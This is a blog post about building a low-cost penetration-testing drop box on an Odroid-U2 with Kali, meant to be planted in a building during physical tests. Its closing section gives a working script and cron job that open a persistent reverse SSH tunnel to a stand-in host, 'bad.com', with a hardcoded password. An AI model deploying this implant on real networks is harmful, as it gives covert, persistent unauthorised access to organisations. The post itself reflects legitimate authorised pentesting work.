Archive for October, 2013

 

Drop Box on the Cheap

Oct 27, 2013 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]
 

I’m sure you’ve all heard of the PwnPlug or other similar types drop boxes. A drop box is a small lightweight system that you can drop into an environment that will call back to you.  The concept is that you are on a physical penetration test and you are able to social engineer your way into the building.  You get into a conference room or an unused cubical, drop a little system, and leave the building.  Now that drop box will connect back to you and you will have full access into their network.

What I needed in a drop box system:

  • Small powerful device that can be inconspicuously plugged into a network
  • Gives a tester access into the company’s network
  • Contains (and can run) all the necessary tools to perform a penetration test (Nmap, metasploit, aircrack, etc)
  • It has to be Fast/Reliable/Cheap
  • Cheap x2, just in case it gets lost/stolen

Looking at what was available on the market, I was able to find the PwnPlugs, PowerPwn, Raspberry-PI, and Odroid.  Let’s start with PwnPlug/PowerPlug.

Both the PwnPlug and PowerPlug can be purchased at http://pwnieexpress.com/.  These are very aesthetically pleasing devices that look inconspicuous.  One of them looks like a powerplug and the other looks like a surge protector.

Respectively, both devices run 1.2 ARM processor/512MB RAM for $995 for the Pwnplug and $1495 for the Powerplug.  So right away the prices on these devices make them unacceptable to my budget.  Not only are they extremely expensive, they run very weak ARM processors with a little RAM.  Trying to run a huge nmap is going to take down the pwnplug.

I also know a lot of people have also been moving over to the Raspberry-PI because of how cheap it is.  The only problem I had with this is that it runs an ARM11 Processor @700 MHz/256MB RAM.  The specs are way too low to be an effective penetration testing tool, even if you can pick one up for under 50 bucks.

  • pi

After all this searching, I was able to find the Odroid-U2.  You can pick one up from: http://www.hardkernel.com/renewal_2011/products/prdt_info.php?g_code=G135341370451.  The Odroid-U2 runs a 4x Cortex-A9 @1.7 GHz/2GB RAM ARM processor.  This kills the pwnplug in terms of performance (the only downside is that it doesn’t have a Gig interface).  I included a picture from their site and also a picture of my Odroid all setup.  The best part is the size of this device with all this power.

  • o2o1

This device fits exactly to what I’m looking for:

  • Cheap: Cost $80
  • 4x Cortex-A9 @1.7 GHz/2GB RAM
  • 10/100 Ethernet
  • 2 x High speed USB2.0 Host port
  • Micro-HDMI
  • MicroSD Card
  • Extremely small

Odroid-U2 runs ARM CPU. Why is That Important?  ARM is a simpler architecture, leading to small silicon area and lots of power save features while x86 becoming a power beast in terms of both power consumption and production.  RISC (ARM) vs CISC (x86) Architecture: ARM instructions operates only on registers with a few instructions for loading and saving data from / to memory.  The real reason I wanted to get more into ARM was for all the CTFs.  A lot of them lately seem to be having executables for ARM processors (like the DefCon Quals this year).  It is definitely something I want to dig deeper into.

Now that I’ve selected a device, I need to configure it will all of my tools and to have the device connect back to me.  Luckily for me, Kali has created an image for the Odroid-U2.  You can download the Odroid U2 image from http://www.kali.org/downloads/.  To install this image onto your Odroid you need to:

  • Using any Linux (you can use Kali if you want), plug in your microSD card into your computer
  • Use the dd utility to image the file you downloaded to your microSD card. (In our example, we assume the storage device is located at /dev/sdb. Change this as needed.)
  • dd if=kali-ordoidu2.img of=/dev/sdb bs=1M
  • Now plug this sdcard into your Odroid

Remember, I need this device to connect back to me and some of the best options I could think of are:

  • Call back on TCP 443/53 using SSH
  • Call back over cellular (too expensive)
  • Create Ad-Hoc Wifi Network and Bridge Networks

The easiest to configure was the reverse SSH tunnel back to a server I own.  The diagram below is kind of how I have it setup.  The Odroid will connect back to my SSH server out in the internet and I’ll tunnel back within the SSH shell to have control of my Odroid.

  •  b

 

Setting up my Odroid SSH Server (on the Odroid)

  • apt-get install openssh-server openssh-client sshpass
  • Create SSH keys: ssh-keygen
  • Edit your /etc/ssh/sshd_config and change Strictmodes from Yes to No
  • ssh-copy-id root@127.0.0.1
  • Now I need to create a bash script to connect home

The following is a script on the Odroid that will first look if it has any SSH tunnels to my server and if not, to login to that server.  Once it connects to my server (in this example, bad.com over port 443), it’ll create a reverse tunnel over port 2221.  If I’m on my server, I SSH to 127.0.0.1 over port 2221 and I’ll be able to SSH into the Odroid.

Script (callback.sh)

#!/bin/sh
if ps -ef | grep -v grep | grep bad.com ; then
  exit 0
else
  sshpass -p ‘pass’ ssh -f -N -T -R2221:localhost:22 bad.com -p443 –l user >> /dev/null &
fi

The following cronjob is set on the Odroid to make sure my script will run every 2 minutes.  Remember that my script will check if it already has a tunnel, so we don’t need to worry about it creating more than one tunnel.

Cronjob (crontab –e)

*/2 * * * * /root/Desktop/callback.sh > /dev/null 2>&1

And that’s it.  When I plug this Odroid into the network, it will log into my server on the internet via SSH. All I need to do is SSH to my localhost over the tunneled port, which forwards the  connection to my Odroid’s SSH server.  Now I have full control of the host and have access to all the tools included in Kali.  Have fun hacking!

P.S. I am in the midst of writing a penetration testing book from all of my experiences. If you are interested in being a beta reviewer, please let me know. You can email me at sec < @ > securepla.net. For the rest of you, it’ll be released hopefully in January.